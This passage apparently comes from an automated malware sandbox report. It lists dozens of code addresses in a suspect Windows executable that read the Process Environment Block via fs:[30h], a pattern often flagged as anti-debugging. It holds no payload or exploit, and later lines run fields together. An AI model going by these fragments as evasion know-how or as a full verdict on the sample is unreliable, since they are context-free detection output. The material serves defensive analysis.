          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h] 1_2_00BB51BE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h] 1_2_00B661A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h] 1_2_00B661A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB69A6 mov eax, dword ptr fs:[00000030h] 1_2_00BB69A6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B62990 mov eax, dword ptr fs:[00000030h] 1_2_00B62990
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6A185 mov eax, dword ptr fs:[00000030h] 1_2_00B6A185
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B5C182 mov eax, dword ptr fs:[00000030h] 1_2_00B5C182
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B3B1E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B3B1E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00B3B1E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BC41E8 mov eax, dword ptr fs:[00000030h] 1_2_00BC41E8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h] 1_2_00B6513A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h] 1_2_00B6513A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h] 1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h] 1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h] 1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h] 1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B54120 mov ecx, dword ptr fs:[00000030h] 1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h] 1_2_00B39100
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h] 1_2_00B39100
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39100 mov eax, dword ptr fs:[00000030h] 1_2_00B39100
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h] 1_2_00B3B171
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3B171 mov eax, dword ptr fs:[00000030h] 1_2_00B3B171
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3C962 mov eax, dword ptr fs:[00000030h] 1_2_00B3C962
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h] 1_2_00B5B944
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B5B944 mov eax, dword ptr fs:[00000030h] 1_2_00B5B944
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00B4AAB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00B4AAB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6FAB0 mov eax, dword ptr fs:[00000030h] 1_2_00B6FAB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h] 1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h] 1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h] 1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h] 1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h] 1_2_00B352A5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h] 1_2_00B6D294
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h] 1_2_00B6D294
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B62AE4 mov eax, dword ptr fs:[00000030h] 1_2_00B62AE4
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B62ACB mov eax, dword ptr fs:[00000030h] 1_2_00B62ACB
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h] 1_2_00B74A2C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h] 1_2_00B74A2C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C08A62 mov eax, dword ptr fs:[00000030h] 1_2_00C08A62
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h] 1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B35210 mov ecx, dword ptr fs:[00000030h] 1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h] 1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h] 1_2_00B35210
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B3AA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B3AA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B53A1C mov eax, dword ptr fs:[00000030h] 1_2_00B53A1C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h] 1_2_00BFAA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h] 1_2_00BFAA16
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B48A0A mov eax, dword ptr fs:[00000030h] 1_2_00B48A0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B7927A mov eax, dword ptr fs:[00000030h] 1_2_00B7927A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h] 1_2_00BEB260
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h] 1_2_00BEB260
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BFEA55 mov eax, dword ptr fs:[00000030h] 1_2_00BFEA55
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BC4257 mov eax, dword ptr fs:[00000030h] 1_2_00BC4257
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h] 1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h] 1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h] 1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h] 1_2_00B39240
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h] 1_2_00B64BAD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h] 1_2_00B64BAD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h] 1_2_00B64BAD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B62397 mov eax, dword ptr fs:[00000030h] 1_2_00B62397
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6B390 mov eax, dword ptr fs:[00000030h] 1_2_00B6B390
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF138A mov eax, dword ptr fs:[00000030h] 1_2_00BF138A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h] 1_2_00B41B8F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h] 1_2_00B41B8F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BED380 mov ecx, dword ptr fs:[00000030h] 1_2_00BED380
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h] 1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h] 1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h] 1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h] 1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h] 1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h] 1_2_00B603E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B5DBE9 mov eax, dword ptr fs:[00000030h] 1_2_00B5DBE9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C05BA5 mov eax, dword ptr fs:[00000030h] 1_2_00C05BA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h] 1_2_00BB53CA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h] 1_2_00BB53CA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C08B58 mov eax, dword ptr fs:[00000030h] 1_2_00C08B58
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF131B mov eax, dword ptr fs:[00000030h] 1_2_00BF131B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h] 1_2_00B63B7A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h] 1_2_00B63B7A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3DB60 mov ecx, dword ptr fs:[00000030h] 1_2_00B3DB60
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3F358 mov eax, dword ptr fs:[00000030h] 1_2_00B3F358
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B3DB40 mov eax, dword ptr fs:[00000030h] 1_2_00B3DB40
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C08CD6 mov eax, dword ptr fs:[00000030h] 1_2_00C08CD6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4849B mov eax, dword ptr fs:[00000030h] 1_2_00B4849B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF14FB mov eax, dword ptr fs:[00000030h] 1_2_00BF14FB
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h] 1_2_00BB6CF0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h] 1_2_00BB6CF0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h] 1_2_00BB6CF0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6BC2C mov eax, dword ptr fs:[00000030h] 1_2_00B6BC2C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h] 1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h] 1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h] 1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h] 1_2_00BB6C0A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h] 1_2_00BF1C06
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h] 1_2_00C0740D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h] 1_2_00C0740D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h] 1_2_00C0740D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B5746D mov eax, dword ptr fs:[00000030h] 1_2_00B5746D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h] 1_2_00BCC450
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h] 1_2_00BCC450
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6A44B mov eax, dword ptr fs:[00000030h] 1_2_00B6A44B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h] 1_2_00B61DB5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]1_2_00B61DB5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]1_2_00B61DB5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B635A1 mov eax, dword ptr fs:[00000030h]1_2_00B635A1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]1_2_00B6FD9B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]1_2_00B6FD9B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]1_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]1_2_00B32D8A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BE8DF1 mov eax, dword ptr fs:[00000030h]1_2_00BE8DF1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B4D5E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B4D5E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]1_2_00BFFDE2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]1_2_00C005AC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]1_2_00C005AC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]1_2_00BB6DC9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]1_2_00B43D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3AD30 mov eax, dword ptr fs:[00000030h]1_2_00B3AD30
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFE539 mov eax, dword ptr fs:[00000030h]1_2_00BFE539
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BBA537 mov eax, dword ptr fs:[00000030h]1_2_00BBA537
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]1_2_00B64D3B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]1_2_00B64D3B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]1_2_00B64D3B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]1_2_00B5C577
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]1_2_00B5C577
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B57D50 mov eax, dword ptr fs:[00000030h]1_2_00B57D50
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08D34 mov eax, dword ptr fs:[00000030h]1_2_00C08D34
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B73D43 mov eax, dword ptr fs:[00000030h]1_2_00B73D43
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB3540 mov eax, dword ptr fs:[00000030h]1_2_00BB3540
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C08ED6 mov eax, dword ptr fs:[00000030h]1_2_00C08ED6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB46A7 mov eax, dword ptr fs:[00000030h]1_2_00BB46A7
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCFE87 mov eax, dword ptr fs:[00000030h]1_2_00BCFE87
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B616E0 mov ecx, dword ptr fs:[00000030h]1_2_00B616E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B476E2 mov eax, dword ptr fs:[00000030h]1_2_00B476E2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]1_2_00C00EA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]1_2_00C00EA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]1_2_00C00EA5
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B78EC7 mov eax, dword ptr fs:[00000030h]1_2_00B78EC7
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B636CC mov eax, dword ptr fs:[00000030h]1_2_00B636CC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BEFEC0 mov eax, dword ptr fs:[00000030h]1_2_00BEFEC0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BEFE3F mov eax, dword ptr fs:[00000030h]1_2_00BEFE3F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3E620 mov eax, dword ptr fs:[00000030h]1_2_00B3E620
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]1_2_00B6A61C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]1_2_00B6A61C
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]1_2_00B3C600
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]1_2_00B3C600
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]1_2_00B3C600
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B68E00 mov eax, dword ptr fs:[00000030h]1_2_00B68E00
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF1608 mov eax, dword ptr fs:[00000030h]1_2_00BF1608
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]1_2_00B5AE73
